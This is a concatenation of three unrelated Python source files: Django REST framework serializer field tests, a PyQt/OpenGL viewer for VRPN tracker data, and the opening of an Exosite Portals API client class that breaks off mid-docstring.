class TestCallableDefault:
def set_context(self, serializer_field):
self.field = serializer_field
def __call__(self):
return "success" if hasattr(self, 'field') else "failure"
class TestSerializer(serializers.Serializer):
context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))
serializer = TestSerializer(data={})
assert serializer.is_valid()
assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
# Tests accept either lists of two tuples, or dictionaries.
if isinstance(mapping_or_list_of_two_tuples, dict):
# {value: expected}
return mapping_or_list_of_two_tuples.items()
# [(value, expected), ...]
return mapping_or_list_of_two_tuples
class FieldValues:
"""
Base class for testing valid and invalid input values.
"""
def test_valid_inputs(self):
"""
Ensure that valid values return the expected validated data.
"""
for input_value, expected_output in get_items(self.valid_inputs):
assert self.field.run_validation(input_value) == expected_output
def test_invalid_inputs(self):
"""
Ensure that invalid values raise the expected validation error.
"""
for input_value, expected_failure in get_items(self.invalid_inputs):
with pytest.raises(serializers.ValidationError) as exc_info:
self.field.run_validation(input_value)
assert exc_info.value.detail == expected_failure
def test_outputs(self):
for output_value, expected_output in get_items(self.outputs):
assert self.field.to_representation(output_value) == expected_output
# Boolean types...
class TestBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
None: ['This field may not be null.']
}
outputs = {
'true': True,
'false': False,
'1': True,
'0': False,
1: True,
0: False,
True: True,
False: False,
'other': True
}
field = serializers.BooleanField()
class TestNullBooleanField(FieldValues):
"""
Valid and invalid values for `BooleanField`.
"""
valid_inputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None
}
invalid_inputs = {
'foo': ['"foo" is not a valid boolean.'],
}
outputs = {
'true': True,
'false': False,
'null': None,
True: True,
False: False,
None: None,
'other': True
}
field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
"""
Valid and invalid values for `CharField`.
"""
valid_inputs = {
1: '1',
'abc': 'abc'
}
invalid_inputs = {
'': ['This field may not be blank.']
}
outputs = {
1: '1',
'abc': 'abc'
}
field = serializers.CharField()
def test_trim_whitespace_default(self):
field = serializers.CharField()
assert field.to_internal_value(' abc ') == 'abc'
def test_trim_whitespace_disabled(self):
field = serializers.CharField(trim_whitespace=False)
assert field.to_internal_value(' abc ') == ' abc '
class TestEmailField(FieldValues):
"""
Valid and invalid values for `EmailField`.
"""
valid_inputs = {
'example@example.com': 'example@example.com',
' example@example.com ': 'example@example.com',
}
invalid_inputs = {
'examplecom': ['Enter a valid email address.']
}
outputs = {}
field = serializers.EmailField()
class TestRegexField(FieldValues):
"""
Valid and invalid values for `RegexField`.
"""
valid_inputs = {
'a9': 'a9',
}
invalid_inputs = {
'A9': ["This value does not match the required pattern."]
}
outputs = {}
field = serializers.RegexField(regex='[a-z][0-9]')
class TestSlugField(FieldValues):
"""
Valid and invalid values for `SlugField`.
"""
valid_inputs = {
'slug-99': 'slug-99',
}
invalid_inputs = {
'slug 99': ['Enter a valid "slug" consisting of letters, numbers, underscores or hyphens.']
}
outputs = {}
field = serializers.SlugField()
class TestURLField(FieldValues):
"""
Valid and invalid values for `URLField`.
"""
valid_inputs = {
'http://example.com': 'http://example.com',
}
invalid_inputs = {
'example.com': ['Enter a valid URL.']
}
outputs = {}
field = serializers.URLField()
class TestUUIDField(FieldValues):
"""
Valid and invalid values for `UUIDField`.
"""
valid_inputs = {
'825d7aeb-05a9-45b5-a5b7-05df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'),
'825d7aeb05a945b5a5b705df87923cda': uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda')
}
invalid_inputs = {
'825d7aeb-05a9-45b5-a5b7': ['"825d7aeb-05a9-45b5-a5b7" is not a valid UUID.']
}
outputs = {
uuid.UUID('825d7aeb-05a9-45b5-a5b7-05df87923cda'): '825d7aeb-05a9-45b5-a5b7-05df87923cda'
}
field = serializers.UUIDField()
# Number types...
class TestIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField`.
"""
valid_inputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0,
'1.0': 1
}
invalid_inputs = {
0.5: ['A valid integer is required.'],
'abc': ['A valid integer is required.'],
'0.5': ['A valid integer is required.']
}
outputs = {
'1': 1,
'0': 0,
1: 1,
0: 0,
1.0: 1,
0.0: 0
}
field = serializers.IntegerField()
class TestMinMaxIntegerField(FieldValues):
"""
Valid and invalid values for `IntegerField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
}
invalid_inputs = {
0: ['Ensure this value is greater than or equal to 1.'],
4: ['Ensure this value is less than or equal to 3.'],
'0': ['Ensure this value is greater than or equal to 1.'],
'4': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.IntegerField(min_value=1, max_value=3)
class TestFloatField(FieldValues):
"""
Valid and invalid values for `FloatField`.
"""
valid_inputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
invalid_inputs = {
'abc': ["A valid number is required."]
}
outputs = {
'1': 1.0,
'0': 0.0,
1: 1.0,
0: 0.0,
1.0: 1.0,
0.0: 0.0,
}
field = serializers.FloatField()
class TestMinMaxFloatField(FieldValues):
"""
Valid and invalid values for `FloatField` with min and max limits.
"""
valid_inputs = {
'1': 1,
'3': 3,
1: 1,
3: 3,
1.0: 1.0,
3.0: 3.0,
}
invalid_inputs = {
0.9: ['Ensure this value is greater than or equal to 1.'],
3.1: ['Ensure this value is less than or equal to 3.'],
'0.0': ['Ensure this value is greater than or equal to 1.'],
'3.1': ['Ensure this value is less than or equal to 3.'],
}
outputs = {}
field = serializers.FloatField(min_value=1, max_value=3)
class TestDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField`.
"""
valid_inputs = {
'12.3': Decimal('12.3'),
'0.1': Decimal('0.1'),
10: Decimal('10'),
0: Decimal('0'),
12.3: Decimal('12.3'),
0.1: Decimal('0.1'),
'2E+2': Decimal('200'),
}
invalid_inputs = (
('abc', ["A valid number is required."]),
(Decimal('Nan'), ["A valid number is required."]),
(Decimal('Inf'), ["A valid number is required."]),
('12.345', ["Ensure that there are no more than 3 digits in total."]),
('0.01', ["Ensure that there are no more than 1 decimal places."]),
(123, ["Ensure that there are no more than 2 digits before the decimal point."])
)
outputs = {
'1': '1.0',
'0': '0.0',
'1.09': '1.1',
'0.04': '0.0',
1: '1.0',
0: '0.0',
Decimal('1.0'): '1.0',
Decimal('0.0'): '0.0',
Decimal('1.09'): '1.1',
Decimal('0.04'): '0.0'
}
field = serializers.DecimalField(max_digits=3, decimal_places=1)
class TestMinMaxDecimalField(FieldValues):
"""
Valid and invalid values for `DecimalField` with min and max limits.
"""
valid_inputs = {
'10.0': Decimal('10.0'),
'20.0': Decimal('20.0'),
}
invalid_inputs = {
'9.9': ['Ensure this value is greater than or equal to 10.'],
'20.1': ['Ensure this value is less than or equal to 20.'],
}
outputs = {}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
min_value=10, max_value=20
)
class TestNoStringCoercionDecimalField(FieldValues):
"""
Output values for `DecimalField` with `coerce_to_string=False`.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
1.09: Decimal('1.1'),
0.04: Decimal('0.0'),
'1.09': Decimal('1.1'),
'0.04': Decimal('0.0'),
Decimal('1.09'): Decimal('1.1'),
Decimal('0.04'): Decimal('0.0'),
}
field = serializers.DecimalField(
max_digits=3, decimal_places=1,
coerce_to_string=False
)
# Date & time serializers...
class TestDateField(FieldValues):
"""
Valid and invalid values for `DateField`.
"""
valid_inputs = {
'2001-01-01': datetime.date(2001, 1, 1),
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1),
}
invalid_inputs = {
'abc': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
'2001-99-99': ['Date has wrong format. Use one of these formats instead: YYYY[-MM[-DD]].'],
datetime.datetime(2001, 1, 1, 12, 00): ['Expected a date but got a datetime.'],
}
outputs = {
datetime.date(2001, 1, 1): '2001-01-01',
'2001-01-01': '2001-01-01',
None: None,
'': None,
}
field = serializers.DateField()
class TestCustomInputFormatDateField(FieldValues):
"""
Valid and invalid values for `DateField` with a cutom input format.
"""
valid_inputs = {
'1 Jan 2001': datetime.date(2001, 1, 1),
}
invalid_inputs = {
'2001-01-01': ['Date has wrong format. Use one of these formats instead: DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateField(input_formats=['%d %b %Y'])
class TestCustomOutputFormatDateField(FieldValues):
"""
Values for `DateField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): '01 Jan 2001'
}
field = serializers.DateField(format='%d %b %Y')
class TestNoOutputFormatDateField(FieldValues):
"""
Values for `DateField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.date(2001, 1, 1): datetime.date(2001, 1, 1)
}
field = serializers.DateField(format=None)
class TestDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField`.
"""
valid_inputs = {
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
'2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()),
# Django 1.4 does not support timezone string parsing.
'2001-01-01T14:00+01:00' if (django.VERSION > (1, 4)) else '2001-01-01T13:00Z': datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC())
}
invalid_inputs = {
'abc': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
'2001-99-99T99:00': ['Datetime has wrong format. Use one of these formats instead: YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z].'],
datetime.date(2001, 1, 1): ['Expected a datetime but got a date.'],
}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '2001-01-01T13:00:00',
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): '2001-01-01T13:00:00Z'
}
field = serializers.DateTimeField(default_timezone=timezone.UTC())
class TestCustomInputFormatDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with a cutom input format.
"""
valid_inputs = {
'1:35pm, 1 Jan 2001': datetime.datetime(2001, 1, 1, 13, 35, tzinfo=timezone.UTC()),
}
invalid_inputs = {
'2001-01-01T20:50': ['Datetime has wrong format. Use one of these formats instead: hh:mm[AM|PM], DD [Jan-Dec] YYYY.']
}
outputs = {}
field = serializers.DateTimeField(default_timezone=timezone.UTC(), input_formats=['%I:%M%p, %d %b %Y'])
class TestCustomOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): '01:00PM, 01 Jan 2001',
}
field = serializers.DateTimeField(format='%I:%M%p, %d %b %Y')
class TestNoOutputFormatDateTimeField(FieldValues):
"""
Values for `DateTimeField` with no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.datetime(2001, 1, 1, 13, 00): datetime.datetime(2001, 1, 1, 13, 00),
}
field = serializers.DateTimeField(format=None)
class TestNaiveDateTimeField(FieldValues):
"""
Valid and invalid values for `DateTimeField` with naive datetimes.
"""
valid_inputs = {
datetime.datetime(2001, 1, 1, 13, 00, tzinfo=timezone.UTC()): datetime.datetime(2001, 1, 1, 13, 00),
'2001-01-01 13:00': datetime.datetime(2001, 1, 1, 13, 00),
}
invalid_inputs = {}
outputs = {}
field = serializers.DateTimeField(default_timezone=None)
class TestTimeField(FieldValues):
"""
Valid and invalid values for `TimeField`.
"""
valid_inputs = {
'13:00': datetime.time(13, 00),
datetime.time(13, 00): datetime.time(13, 00),
}
invalid_inputs = {
'abc': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
'99:99': ['Time has wrong format. Use one of these formats instead: hh:mm[:ss[.uuuuuu]].'],
}
outputs = {
datetime.time(13, 00): '13:00:00'
}
field = serializers.TimeField()
class TestCustomInputFormatTimeField(FieldValues):
"""
Valid and invalid values for `TimeField` with a custom input format.
"""
valid_inputs = {
'1:00pm': datetime.time(13, 00),
}
invalid_inputs = {
'13:00': ['Time has wrong format. Use one of these formats instead: hh:mm[AM|PM].'],
}
outputs = {}
field = serializers.TimeField(input_formats=['%I:%M%p'])
class TestCustomOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a custom output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): '01:00PM'
}
field = serializers.TimeField(format='%I:%M%p')
class TestNoOutputFormatTimeField(FieldValues):
"""
Values for `TimeField` with a no output format.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = {
datetime.time(13, 00): datetime.time(13, 00)
}
field = serializers.TimeField(format=None)
@pytest.mark.skipif(django.VERSION < (1, 8),
reason='DurationField is only available for django1.8+')
class TestDurationField(FieldValues):
"""
Valid and invalid values for `DurationField`.
"""
valid_inputs = {
'13': datetime.timedelta(seconds=13),
'3 08:32:01.000123': datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
'08:01': datetime.timedelta(minutes=8, seconds=1),
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123),
}
invalid_inputs = {
'abc': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
'3 08:32 01.123': ['Duration has wrong format. Use one of these formats instead: [DD] [HH:[MM:]]ss[.uuuuuu].'],
}
outputs = {
datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
}
if django.VERSION >= (1, 8):
field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
"""
Valid and invalid values for `ChoiceField`.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'amazing': ['"amazing" is not a valid choice.']
}
outputs = {
'good': 'good',
'': '',
'amazing': 'amazing',
}
field = serializers.ChoiceField(
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.ChoiceField(
allow_blank=True,
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
output = field.run_validation('')
assert output == ''
class TestChoiceFieldWithType(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses an integer type,
instead of a char type.
"""
valid_inputs = {
'1': 1,
3: 3,
}
invalid_inputs = {
5: ['"5" is not a valid choice.'],
'abc': ['"abc" is not a valid choice.']
}
outputs = {
'1': 1,
1: 1
}
field = serializers.ChoiceField(
choices=[
(1, 'Poor quality'),
(2, 'Medium quality'),
(3, 'Good quality'),
]
)
class TestChoiceFieldWithListChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a flat list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestMultipleChoiceField(FieldValues):
"""
Valid and invalid values for `MultipleChoiceField`.
"""
valid_inputs = {
(): set(),
('aircon',): set(['aircon']),
('aircon', 'manual'): set(['aircon', 'manual']),
}
invalid_inputs = {
'abc': ['Expected a list of items but got type "str".'],
('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
}
outputs = [
(['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
]
field = serializers.MultipleChoiceField(
choices=[
('aircon', 'AirCon'),
('manual', 'Manual drive'),
('diesel', 'Diesel'),
]
)
def test_against_partial_and_full_updates(self):
# serializer = self.Serializer(data=MockHTMLDict())
from django.http import QueryDict
field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
field.partial = False
assert field.get_value(QueryDict({})) == []
field.partial = True
assert field.get_value(QueryDict({})) == rest_framework.fields.empty
# File serializers...
class MockFile:
def __init__(self, name='', size=0, url=''):
self.name = name
self.size = size
self.url = url
def __eq__(self, other):
return (
isinstance(other, MockFile) and
self.name == other.name and
self.size == other.size and
self.url == other.url
)
class TestFileField(FieldValues):
"""
Values for `FileField`.
"""
valid_inputs = [
(MockFile(name='example', size=10), MockFile(name='example', size=10))
]
invalid_inputs = [
('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
(MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
(MockFile(name='', size=10), ['No filename could be determined.']),
(MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
]
outputs = [
(MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
('', None)
]
field = serializers.FileField(max_length=10)
class TestFieldFieldWithName(FieldValues):
"""
Values for `FileField` with a filename output instead of URLs.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = [
(MockFile(name='example.txt', url='/example.txt'), 'example.txt')
]
field = serializers.FileField(use_url=False)
# Stub out mock Django `forms.ImageField` class so we don't *actually*
# call into it's regular validation, or require PIL for testing.
class FailImageValidation(object):
def to_python(self, value):
raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
def to_python(self, value):
return value
class TestInvalidImageField(FieldValues):
"""
Values for an invalid `ImageField`.
"""
valid_inputs = {}
invalid_inputs = [
(MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
]
outputs = {}
field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
"""
Values for an valid `ImageField`.
"""
valid_inputs = [
(MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
]
invalid_inputs = {}
outputs = {}
field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
"""
Values for `ListField` with IntegerField as child.
"""
valid_inputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
([1, 2, 'error'], ['A valid integer is required.'])
]
outputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
field = serializers.ListField(child=serializers.IntegerField())
class TestUnvalidatedListField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
]
outputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
field = serializers.ListField()
class TestDictField(FieldValues):
"""
Values for `ListField` with CharField as child.
"""
valid_inputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
invalid_inputs = [
({'a': 1, 'b': None}, ['This field may not be null.']),
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField())
class TestUnvalidatedDictField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
]
invalid_inputs = [
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
]
field = serializers.DictField()
# Tests for FieldField.
# ---------------------
class MockRequest:
def build_absolute_uri(self, value):
return 'http://example.com' + value
class TestFileFieldContext:
def test_fully_qualified_when_request_in_context(self):
field = serializers.FileField(max_length=10)
field._context = {'request': MockRequest()}
obj = MockFile(name='example.txt', url='/example.txt')
value = field.to_representation(obj)
assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
def test_serializer_method_field(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField()
def get_example_field(self, obj):
return 'ran get_example_field(%d)' % obj['example_field']
serializer = ExampleSerializer({'example_field': 123})
assert serializer.data == {
'example_field': 'ran get_example_field(123)'
}
def test_redundant_method_name(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField('get_example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `get_example_field` on "
"SerializerMethodField 'example_field' in serializer "
"'ExampleSerializer', because it is the same as the default "
"method name. Remove the `method_name` argument."
)
| |
#!/usr/bin/python
#
# Small program to examine positional data from a VRPN tracker
#
# Requirements:
# apt-get install python-qt python-qt-gl
#
import sys
import math
import time
import optparse
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtOpenGL import *
from OpenGL.GL import *
from OpenGL.GLU import *
sys.path.append(".")
import vrpn_Tracker
VERBOSE = False
#
class GLCamera:
def __init__(self):
self.angle = 0
self.radius = 10
self.height = 2
pass
def gluLookAt(self):
x = self.radius * math.sin(self.angle)
y = self.height
z = self.radius * math.cos(self.angle)
gluLookAt(x, y, z,
0.0, 0.0, 0.0,
0.0, 1.0, 0.0)
pass
pass
#
def convert_to_glmatrix(pos, quat):
m = [1,0,0,0,
0,1,0,0,
0,0,1,0,
0,0,0,1]
p4_2 = quat[0]*2; p5_2 = quat[1]*2; p6_2 = quat[2]*2;
xx = p4_2*quat[0]; xy = p4_2*quat[1]; xz = p4_2*quat[2];
yy = p5_2*quat[1]; yz = p5_2*quat[2];
zz = p6_2*quat[2];
sx = quat[3]*p4_2; sy = quat[3]*p5_2; sz = quat[3]*p6_2;
m[0] =1.0-(yy+zz); m[4] = (xy-sz); m[8] = (xz+sy);
m[1] = (xy+sz); m[5] =1.0-(xx+zz); m[9] = (yz-sx);
m[2] = (xz-sy); m[6] = (yz+sx); m[10]=1.0-(xx+yy);
m[3] =0 ; m[7] =0 ; m[11]=0 ;
m[12] = pos[0]
m[13] = pos[1]
m[14] = pos[2]
m[15] = 1.0
return m
#
def draw_grid(scale):
glLineWidth(1)
#glColor4f(0.9, 0.9, 0.9, 0.9)
glBegin(GL_LINES)
s = scale
for i in range(-5,6):
glVertex3f(i, 0, s)
glVertex3f(i, 0, -s)
pass
for i in range(-5,6):
glVertex3f( s, 0, i)
glVertex3f(-s, 0, i)
pass
glEnd()
pass
#
def draw_axes(scale):
s = scale
glLineWidth(2)
glBegin(GL_LINES)
glColor3f(1,0,0) # x - r
glVertex3f(0,0,0)
glVertex3f(s,0,0)
glColor3f(0,1,0) # y - g
glVertex3f(0,0,0)
glVertex3f(0,s,0)
glColor3f(0.2,0.2,1) # z - b
glVertex3f(0,0,0)
glVertex3f(0,0,s)
glEnd()
pass
#
class ViewWidget3D(QGLWidget):
def __init__(self, parent):
QGLWidget.__init__(self, parent)
self.setFocusPolicy(Qt.StrongFocus)
self.lastmousepos = None
self.camera = GLCamera()
self.quadric = gluNewQuadric()
self.mutex = QMutex()
self.points = {}
pass
def initializeGL(self):
QGLWidget.initializeGL(self)
glClearColor(0,0,0,1)
pass
def resizeGL(self, w, h):
glViewport(0, 0, w, h)
pass
def paintGL(self):
QGLWidget.paintGL(self)
# erase previous frame
glClear(GL_COLOR_BUFFER_BIT)
# setup matrices
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(45, self.width()/float(self.height()), 1, 100)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
self.camera.gluLookAt()
# grid
glPushMatrix()
glColor4f(1,1,1,1)
draw_grid(5)
glPopMatrix()
# axes
glPushMatrix()
draw_axes(1)
glPopMatrix()
# points
radius = 0.05
self.mutex.lock()
glColor4f(1,1,1,1)
for id in self.points:
p = self.points[id]
try: pos, quat = p[0:3], p[3:]
except: pass
m = convert_to_glmatrix(pos, quat)
glPushMatrix()
glMultMatrixf(m)
gluSphere(self.quadric, radius, 4,4)
self.renderText(radius, radius, radius, "%d"%(id,))
draw_axes(0.1)
glPopMatrix()
pass
self.mutex.unlock()
pass
def mouseMoveEvent(self, event):
if self.lastmousepos == None:
self.lastmousepos = QVector2D(event.x(), event.y())
return
newpos = QVector2D(event.x(), event.y())
dt = newpos - self.lastmousepos
self.lastmousepos = newpos
self.camera.angle -= dt.x() / self.width() * 2
self.camera.height -= dt.y() / self.height() * 2
self.update()
pass
def mousePressEvent(self, event):
pass
def mouseReleaseEvent(self, event):
self.lastmousepos = None
pass
def wheelEvent(self, event):
if(event.delta() > 0):
self.camera.radius *= 0.9
else:
self.camera.radius *= 1.1
pass
self.update()
pass
def keyReleaseEvent(self, event):
if event.text() == 'q':
pass
self.update()
pass
def handler(self, userdata, t):
if VERBOSE:
print userdata, t
pass
self.mutex.lock()
try:
self.points[t[0]] = t[1:]
pass
except:
print "unknown data: ", t
pass
self.mutex.unlock()
self.update()
pass
pass
#
class mainthread(QThread):
def __init__(self, tracker, widget):
QThread.__init__(self)
self.tracker = tracker
self.widget = widget
pass
def run(self):
while True:
self.tracker.mainloop()
time.sleep(0)
pass
pass
pass
#
def main(argv):
global VERBOSE
# parse command line
parser = optparse.OptionParser()
parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true")
options, args = parser.parse_args()
if len(args) < 1:
print "no tracker specified (Example: Tracker0@localhost)"
return
print "using tracker: ", args[0]
if options.verbose:
print "verbose mode"
VERBOSE = True
pass
# create QT widgets
app = QApplication(argv)
mw = QMainWindow()
widget = ViewWidget3D(mw)
mw.setCentralWidget(widget)
mw.resize(800,600)
mw.show()
# create VRPN tracker and register change handlers
vrpn_Tracker.register_tracker_change_handler(widget.handler)
tracker = vrpn_Tracker.vrpn_Tracker_Remote(argv[1])
tracker.register_change_handler(None, vrpn_Tracker.get_tracker_change_handler())
# start main thread
mt = mainthread(tracker,widget)
mt.start()
# start main app
app.exec_()
pass
main(sys.argv)
| |
# pylint: disable=W0312,R0913
import requests, json
from pyonep.portals.constants import HTTP_STATUS
from pyonep.portals.endpoints import Endpoints
from pyonep.portals.utils import dictify_device_meta,\
stringify_device_meta
from getpass import getpass
import sys
if sys.version_info[0] < 3:
_input = raw_input
else:
_input = input
class Portals(Endpoints):
def __init__( self,
domain,
portal_name,
user,
auth='__prompt__',
use_token=False,
debug=False):
"""
Params:
domain: the domain of the Exosite domain your Portal is on.
i.e. mydomain.exosite.com
portal_name: the name of the Exosite Portal. i.e. 'My Device Portal'
user: typically, the email address you use to logon to Portals
or your Portals user name
auth: if left blank, the creator of the Portals object will
be prompted for their Portals password if specifying the
auth parameter, it should be either the user password or a
Portals token
use_token: if using a token in the auth parameter, set this to True.
Otherwise, leave blank
"""
if auth == '__prompt__':
print('') # some interpreters don't put a newline before the getpass prompt
auth = getpass('Enter User Password: ')
else:
auth = auth
Endpoints.__init__( self,
domain,
portal_name,
user,
auth,
use_token=use_token
)
def get_portals_list(self):
""" Method to return a list of Portal names with their id's.
Returns list of tuples as [(id_1, portal_name1), (id_2, portal_name2)]
"""
portal_ids = self.get_domain_portal_ids()
portals = [ (p, self.get_portal_by_id(p)) for p in portal_ids ]
return [ (p[0], p[1]['info']['description']['name'], p) for p in portals ]
def user_portals_picker(self):
"""
This function is broken and needs to either be fixed or discarded.
User-Interaction function. Allows user to choose which Portal
to make the active one.
"""
# print("Getting Portals list. This could take a few seconds...")
portals = self.get_portals_list()
done = False
while not done:
opts = [ (i, p) for i, p in enumerate(portals) ]
# print('')
for opt, portal in opts:
print("\t{0} - {1}".format(opt, portal[1]))
# print('')
valid_choices = [o[0] for o in opts]
choice = _input("Enter choice ({0}): ".format(valid_choices) )
if int(choice) in valid_choices:
done = True
# loop through all portals until we find an 'id':'rid' match
self.set_portal_name( opts[int(choice)][1][1] )
self.set_portal_id( opts[int(choice)][1][0] )
# self.set_portal_rid( opts[int(choice)][1][2][1]['info']['key'] )
# self.__portal_sn_rid_dict = opts[int(choice)][1][2][1]['info']['aliases']
else:
print("'{0}' is not a valid choice. Please choose from {1}".format(
choice, valid_choices))
def get_portal_by_name(self, portal_name):
"""
Set active portal according to the name passed in 'portal_name'.
Returns dictionary of device 'serial_number: rid'
"""
portals = self.get_portals_list()
for p in portals:
# print("Checking {!r}".format(p))
if portal_name == p[1]:
# print("Found Portal!")
self.set_portal_name( p[1] )
self.set_portal_id( p[0] )
self.set_portal_cik( p[2][1]['info']['key'] )
# print("Active Portal Details:\nName: {0}\nId: {1}\nCIK: {2}".format(
# self.portal_name(),
# self.portal_id(),
# self.portal_cik()))
return p
return None
@classmethod
def login_to_portal(cls,
domain=None,
portal_name=None,
user=None,
credential=None,
use_token=False,
portal_id=None,
# portal_rid=None,
get_devices=False,
debug=False):
"""
A classmethod that returns a (token, Portals object) tuple.
This method can be interactive based on the input arguments.
Sets up the Portals object with all the member variables
it needs to make future api calls. It basically just calls
Portals.get_portal_by_name(), but instead of returning a
Portals object, it returns a Portals() object.
This is a convenience function that can be called at the
time of instantiation.
